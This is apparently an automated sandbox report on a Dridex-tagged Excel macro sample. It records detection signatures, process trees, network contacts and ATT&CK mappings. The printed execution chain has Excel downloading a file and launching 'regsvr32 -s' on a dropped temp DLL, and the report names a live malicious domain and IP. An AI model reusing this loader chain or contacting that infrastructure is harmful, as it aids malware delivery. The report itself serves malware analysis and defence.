
Analysis Report sample20210111-01.xlsm

Overview

General Information

Sample Name: sample20210111-01.xlsm
Analysis ID: 338158
MD5: fa5350d4304c4c2ceafa435244b5a5fc
SHA1: fc8a20962b8cf86568b1e85be02ee9c7b62d94b2
SHA256: 0104974a7bf43e2e31d25ae485f57c62efe89eaea2d3e520db8a76fa70dd956d
Tags: Dridex, xlsm

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: BlueMashroom DLL Load
Document contains an embedded VBA macro which may execute processes
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
Sigma detected: Regsvr32 Anomaly
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops certificate files (DER)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2032 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2324 cmdline: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll. MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • DW20.EXE (PID: 3032 cmdline: 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1948 MD5: 45A078B2967E0797360A2D4434C41DB4)
      • DWWIN.EXE (PID: 2472 cmdline: C:\Windows\system32\dwwin.exe -x -s 1948 MD5: 25247E3C4E7A7A73BAEEA6C0008952B1)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: BlueMashroom DLL Load
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2032, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., ProcessId: 2324
Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team | Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2032, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., ProcessId: 2324
Sigma detected: Regsvr32 Anomaly
Source: Process started | Author: Florian Roth | Data: Command: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., CommandLine|base64offset|contains: , Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2032, ProcessCommandLine: 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll., ProcessId: 2324

Signature Overview

AV Detection:

Multi AV Scanner detection for domain / URL
Source: ppdb-legacy.man1lamongan.com | Virustotal: Detection: 6%
Multi AV Scanner detection for submitted file
Source: sample20210111-01.xlsm | Virustotal: Detection: 26%
Source: sample20210111-01.xlsm | ReversingLabs: Detection: 21%
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic | DNS query: name: ppdb-legacy.man1lamongan.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 199.59.242.150:443
Source: Joe Sandbox View | IP Address: 199.59.242.150
Source: Joe Sandbox View | ASN Name: BODIS-NJUS
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B9858B0.emf
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: ppdb-legacy.man1lamongan.com
Source: 3C428B1A3E5F57D887EC4B864FAC5DCC.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt
Source: DWWIN.EXE, 00000005.00000003.2231318358.0000000000204000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: DWWIN.EXE, 00000005.00000003.2231408116.0000000003621000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: DWWIN.EXE, 00000005.00000003.2231404153.0000000003618000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: DWWIN.EXE, 00000005.00000003.2231318358.0000000000204000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: DWWIN.EXE, 00000005.00000003.2231318358.0000000000204000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: DWWIN.EXE, 00000005.00000003.2231318358.0000000000204000.00000004.00000001.sdmp, 77EC63BDA74BD0D0E0426DC8F8008506.5.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: DWWIN.EXE, 00000005.00000002.2231667864.00000000001ED000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enG
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: DWWIN.EXE, 00000005.00000003.2231393880.0000000000258000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: DWWIN.EXE, 00000005.00000003.2231318358.0000000000204000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0
Source: DWWIN.EXE, 00000005.00000003.2231408116.0000000003621000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: DWWIN.EXE, 00000005.00000002.2239715014.0000000003E10000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2103191822.0000000001D10000.00000002.00000001.sdmp, DWWIN.EXE, 00000005.00000002.2236119170.0000000002340000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: DWWIN.EXE, 00000005.00000002.2239715014.0000000003E10000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49169
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49168 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49169 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443
Source: C:\Windows\System32\DWWIN.EXE | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

System Summary:

Document contains an embedded VBA macro which may execute processes
Source: VBA code instrumentation | OLE, VBA macro: Module Module1, Function pagesREviewsd, API Run("moreP_ab")
Found Excel 4.0 Macro with suspicious formulas
Source: sample20210111-01.xlsm | Initial sample: CALL (4 occurrences)
Source: sample20210111-01.xlsm | OLE, VBA macro line: Private Sub view_1_a_Layout(ByVal Index As Long)
Source: VBA code instrumentation | OLE, VBA macro: Module Sheet1, Function view_1_a_Layout
Source: sample20210111-01.xlsm | OLE indicator, VBA macros: true
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1948
Source: DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal88.expl.evad.winXLSM@7/19@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$sample20210111-01.xlsm
Source: C:\Windows\System32\DWWIN.EXE | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2032
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRDD25.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\DWWIN.EXE | File read: C:\Windows\System32\drivers\etc\hosts (2 occurrences)
Source: sample20210111-01.xlsm | Virustotal: Detection: 26%
Source: sample20210111-01.xlsm | ReversingLabs: Detection: 21%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll.
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1948
Source: unknown | Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1948
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll.
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE 'C:\PROGRA~1\COMMON~1\MICROS~1\DW\DW20.EXE' -x -s 1948
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE | Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1948
Source: C:\Windows\System32\DWWIN.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{713AACC8-3B71-435C-A3A1-BE4E53621AB1}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Automated click: OK (2 occurrences)
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: sample20210111-01.xlsm | Initial sample: OLE zip file path = xl/media/image2.png
Source: sample20210111-01.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: sample20210111-01.xlsm | Initial sample: OLE indicators vbamacros = False
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\fhmhkjo.dll.
Source: C:\Windows\System32\DWWIN.EXE | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (37 occurrences)
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE | Process information set: NOOPENFILEERRORBOX (3 occurrences)
Source: C:\Windows\System32\DWWIN.EXE | Process information set: NOOPENFILEERRORBOX (17 occurrences)
Source: C:\Windows\System32\DWWIN.EXE TID: 2484 | Thread sleep time: -60000s >= -30000s
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information queried: ProcessInformation
Source: C:\Program Files\Common Files\Microsoft Shared\DW\DW20.EXE | Process created: C:\Windows\System32\DWWIN.EXE C:\Windows\system32\dwwin.exe -x -s 1948

Mitre Att&ck Matrix

Techniques listed per tactic column (a trailing number is the count shown next to the technique in the report):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Scripting 22; Exploitation for Client Execution 23; At (Linux); At (Windows); Cron; Launchd
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection 11; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Masquerading 1; Virtualization/Sandbox Evasion 1; Process Injection 11; Scripting 22; Regsvr32 1; Steganography
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry 1; Virtualization/Sandbox Evasion 1; Process Discovery 1; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 2
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel 2; Ingress Tool Transfer 1; Non-Application Layer Protocol 1; Application Layer Protocol 2; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features

Behavior Graph

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
sample20210111-01.xlsm | 27% | Virustotal |
sample20210111-01.xlsm | 8% | Metadefender |
sample20210111-01.xlsm | 22% | ReversingLabs | Script-Macro.Trojan.Wacatac

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source | Detection | Scanner | Label
cdn.digicertcdn.com | 0% | Virustotal |
ppdb-legacy.man1lamongan.com | 6% | Virustotal |

URLs

Source | Detection | Scanner | Label
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
cdn.digicertcdn.com | 104.18.10.39 | true | false | | unknown
ppdb-legacy.man1lamongan.com | 199.59.242.150 | true | true | | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmp | false | | high
http://www.windows.com/pctv. | DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | false | | high
http://investor.msn.com | DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | false | | high
http://www.msnbc.com/news/ticker.txt | DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | false | | high
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | DWWIN.EXE, 00000005.00000002.2239715014.0000000003E10000.00000002.00000001.sdmp | false | | high
http://crl.entrust.net/server1.crl0 | DWWIN.EXE, 00000005.00000003.2231408116.0000000003621000.00000004.00000001.sdmp | false | | high
http://ocsp.entrust.net03 | DWWIN.EXE, 00000005.00000003.2231408116.0000000003621000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://investor.msn.com/ | DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | false | | high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | DWWIN.EXE, 00000005.00000003.2231404153.0000000003618000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.%s.comPA | DWWIN.EXE, 00000005.00000002.2239715014.0000000003E10000.00000002.00000001.sdmp | false | URL Reputation: safe | low
http://www.diginotar.nl/cps/pkioverheid0 | DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | DWWIN.EXE, 00000005.00000002.2238158063.0000000003417000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | DWWIN.EXE, 00000005.00000002.2237945619.0000000003230000.00000002.00000001.sdmp | false | | high
http://ocsp.entrust.net0D | DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://secure.comodo.com/CPS0 | DWWIN.EXE, 00000005.00000003.2231343971.0000000000213000.00000004.00000001.sdmp | false | | high
http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.2103191822.0000000001D10000.00000002.00000001.sdmp, DWWIN.EXE, 00000005.00000002.2236119170.0000000002340000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
http://crl.entrust.net/2048ca.crl0 | DWWIN.EXE, 00000005.00000002.2238579507.0000000003661000.00000004.00000001.sdmp | false | | high

                      Contacted IPs


                      Public

IP | Domain | Country | ASN | ASN Name | Malicious
199.59.242.150 | unknown | United States | 395082 | BODIS-NJUS | true

                      General Information

                      Joe Sandbox Version:31.0.0 Red Diamond
                      Analysis ID:338158
                      Start date:11.01.2021
                      Start time:18:27:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 5m 38s
                      Hypervisor based Inspection enabled:false
                      Report type:light
                      Sample file name:sample20210111-01.xlsm
                      Cookbook file name:defaultwindowsofficecookbook.jbs
                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed:8
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • HDC enabled
                      • GSI enabled (VBA)
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Detection:MAL
                      Classification:mal88.expl.evad.winXLSM@7/19@1/1
                      EGA Information:Failed
                      HDC Information:Failed
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 0
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Adjust boot time
                      • Enable AMSI
                      • Found application associated with file extension: .xlsm
                      • Found Word or Excel or PowerPoint or XPS Viewer
                      • Found warning dialog
                      • Click Ok
                      • Found warning dialog
                      • Click Ok
                      • Found warning dialog
                      • Click Ok
                      • Attach to Office via COM
                      • Close Viewer
                      Warnings:
                      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 13.88.21.125, 13.64.90.137, 104.18.10.39, 93.184.221.240
                      • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, wu.azureedge.net, watson.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, wu.wpc.apr-52dd2.edgecastdns.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

Time | Type | Description
18:28:06 | API Interceptor | 500x Sleep call for process: DWWIN.EXE modified

                      Joe Sandbox View / Context

                      IPs

Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context
                      199.59.242.150http://undo.itGet hashmaliciousBrowse
                      • undo.it/favicon.ico
                      jsezPXBYSo.exeGet hashmaliciousBrowse
                      • sec.timerz.org/addrecord.php?apikey=ab89_api_key&compuser=computer|user&sid=KKiFporIlJnvi8Sj&phase=4F85366F80624A21|86401|24GB
                      7RR6UWAoLz.exeGet hashmaliciousBrowse
                      • gmn.timerz.org/addrecord.php?apikey=snt2_api_key&compuser=computer|user&sid=yyy3DVSKqMS7CQxS&phase=0896C02011BCDB3F|72920|22GB
                      ToNKWS7M79.exeGet hashmaliciousBrowse
                      • ghb.timerz.org/addrecord.php?apikey=aw46_api_key&compuser=computer|user&sid=y3fPLg7isdS74dQX&phase=20FE743FCD18FAB6|75361|22GB
                      8AkYlqVWsi.exeGet hashmaliciousBrowse
                      • sec.timerz.org/addrecord.php?apikey=ab89_api_key&compuser=computer|user&sid=z0mSMg7UwftUb8zT&phase=56567FFFCCF9B369|86789|24GB
                      http://microsoftexchangeservert8zr2.nut.ccGet hashmaliciousBrowse
                      • free-today.com/favicon.ico
                      10Order.exeGet hashmaliciousBrowse
                      • www.oklahomapayday.loan/hx271/
                      animeonline.netGet hashmaliciousBrowse
                      • animeonline.net/rz?u=http%3A%2F%2Fusa.bravo-dog.com%2Fzcvisitor%2F929a5c76-3212-11e8-91bc-0a8ca3fd4c72%3Fcampaignid%3Df6228670-4b89-11e7-b1d2-0eda985eb958&notadsafe
                      199.59.242.150Get hashmaliciousBrowse
                      • 199.59.242.150/favicon.ico
                      http://galereya-mebel.ru/Question/Get hashmaliciousBrowse
                      • datadrivensolution.com/?kw=ftz&p=2&rndx=1521403861663
                      WgfMD4LKDZ.exeGet hashmaliciousBrowse
                      • awskohg.wecloudapi.com/cl/downloader?version=47.10.2526.80&channel=january&d=0&userid=&sys=6.1
                      http://ufcna.com/glp?r=&u=http%3A%2F%2Fufcna.com%2Fflux-radar-Orly-D-est-05.jpg&rw=1280&rh=1024&ww=784&wh=490Get hashmaliciousBrowse
                      • ufcna.com/glp?r=&u=http://ufcna.com/flux-radar-Orly-D-est-05.jpg&rw=1280&rh=1024&ww=784&wh=490
                      15filee.exeGet hashmaliciousBrowse
                      • www.pennsylvaniaauto.loan/hx187/?9r=2ZpML92nryXLTbqctj2GuhH0VJyGjH5quSw7FLYH454OQrtH6v4Ycy4rEoZBWjtue2zE2QlA621ynJn6JpRd7A==&8pBXn=3f3DUfw&sql=1
                      .exeGet hashmaliciousBrowse
